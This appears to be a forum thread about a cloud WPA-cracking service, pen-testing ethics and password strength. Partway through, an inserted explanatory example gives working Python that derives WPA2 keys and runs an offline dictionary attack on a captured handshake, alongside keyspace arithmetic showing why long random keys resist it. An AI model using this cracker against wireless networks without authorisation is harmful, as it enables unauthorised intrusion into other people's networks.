Any simple password generator (say, Apple's Keychain, or pwgen) should be able to generate a non-dictionary key of length 12-16 characters in a few seconds that would withstand this and most similar techniques for the next few years.
A depressingly large number of recently manufactured routers do, and it is on by default by mandate of the WiFi alliance. If the router is Cisco/Linksys, in many instances you can't disable it, at least as I understand it.
From a Reuters article about a similar program by German security researcher Thomas Roth [1]:
"Nothing in this researcher's work is predicated on the use of Amazon EC2. As researchers often do, he used EC2 as a tool to show how the security of some network configurations can be improved," said Amazon spokesman Drew Herdener.
It's times like these I'm glad my WPA password is 63 characters long. It's easy for me to remember, though, as it's a long sentence. Bit of a pain when setting stuff like Apple TV up though :/
Why not? A WPA handshake can be considered public information. Connecting to that particular ESSID yields all that's needed to brute force WPA and would be considered external. There are no limitations this presents to pen testers. However, for $17 this is a relatively small dictionary set. Based on what we use for real world pen testing we have just shy of 1 billion unique words / phrases.
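Added worked example (not code from any commenter or from the service under discussion) showing why a captured handshake is "all that's needed": the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), the PTK and the EAPOL MIC are derived from it plus values that travel in the clear (MACs, ANonce, SNonce, the EAPOL-Key frame), so every candidate in a dictionary can be checked offline. It also puts numbers on the earlier point about 12-16 character random keys versus a word list. The SSID, MACs, nonces, EAPOL bytes and guess rates are constructed for the demo; a real attack takes them from a capture.

```python
import hashlib
import hmac
import math

WPA_PBKDF2_ITERATIONS = 4096  # fixed by IEEE 802.11i for passphrase -> PMK


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).

    The 4096 iterations make each guess cost ~8192 SHA-1 calls, which is why the
    practical attack is a word list, not exhaustive search of a random key.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), WPA_PBKDF2_ITERATIONS, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
        counter += 1
    return out[:length]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (384 bits). The first 16 bytes are the KCK that keys the MIC.

    Every input except the PMK is visible in the air, so the handshake gives an
    attacker everything but the passphrase.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(hs: dict, candidates):
    """Offline dictionary attack against a captured handshake.

    Returns (passphrase, guesses_tried) on success, (None, guesses_tried) otherwise.
    """
    tried = 0
    for candidate in candidates:
        tried += 1
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"],
                           hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate, tried
    return None, tried


def make_sample_handshake(ssid: str, passphrase: str) -> dict:
    """Constructed stand-in for a captured 4-way handshake (no real capture involved)."""
    ap_mac = bytes.fromhex("001122334455")   # constructed BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # constructed client MAC
    anonce = hashlib.sha256(b"sample-anonce").digest()  # constructed nonces
    snonce = hashlib.sha256(b"sample-snonce").digest()
    # Stand-in for EAPOL-Key message 2 with its MIC field zeroed; a real
    # capture supplies the actual frame bytes.
    eapol = bytes.fromhex("0103007502010a00") + bytes(8) + snonce + bytes(50)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random key of `length` symbols over `alphabet_size` symbols."""
    return length * math.log2(alphabet_size)


def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Wall-clock years to try the whole keyspace at an assumed guess rate."""
    return alphabet_size ** length / guesses_per_second / (365.25 * 86400)


if __name__ == "__main__":
    hs = make_sample_handshake("HomeNet", "correct horse")
    print(crack_handshake(hs, ["password", "letmein", "HomeNet1", "correct horse"]))
    # 12 random alphanumerics vs. a 1e9-word list; 1e6 guesses/s is an assumed rate.
    print(keyspace_bits(62, 12), years_to_exhaust(62, 12, 1e6))
```

The arithmetic in the last two functions is the point of the "12-16 non-dictionary characters" advice: a billion-word list is about 30 bits, a 12-character random alphanumeric key is about 71 bits, and at PBKDF2's 4096 iterations that difference is decades versus minutes for anyone whose offering is "a dictionary run over your handshake".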
Technically it's public but you need to be responsible with how you deal with your client's data. Even if the NDA says nothing about releasing handshake details, you still have to explain to your client why a WPA-cracking website has details about their infrastructure.
I agree the convenience is attractive but I wouldn't want to put myself in that position.
Interesting thought, but the reality of the situation is quite different. If something is in the public domain (i.e. something you can see, hear or smell), what provisions within the realm of the law protect you from using that sensory data? A company's parking lot may have provisions for me not entering it (i.e. guard, fence, etc.), but if I perch myself on a parking ramp across the street and use a camera with a powerful lens I can still take pictures of cars and people within the lot.
The same is true for radio, and conversely 802.11. If you expose yourself to data leakage via loud APs / incorrect antenna then it should be well understood that that information is being placed in the public domain (i.e. WPA handshake). A would-be malicious user is not bound by any of the restrictions mentioned, and so placing them on people that are knowingly auditing is highly counterproductive unless all the client is going for is a warm fuzzy. This particular way of thinking about pen testing and assessments needs to be at the forefront of the testing itself, because if the client is that misinformed/misled they probably need more help than an incorrectly scoped assessment.
That depends entirely on the terms of the engagement. If this service (or others) had agreeable data retention/use terms, then the pentester and the client could include that as an acceptable use of their data.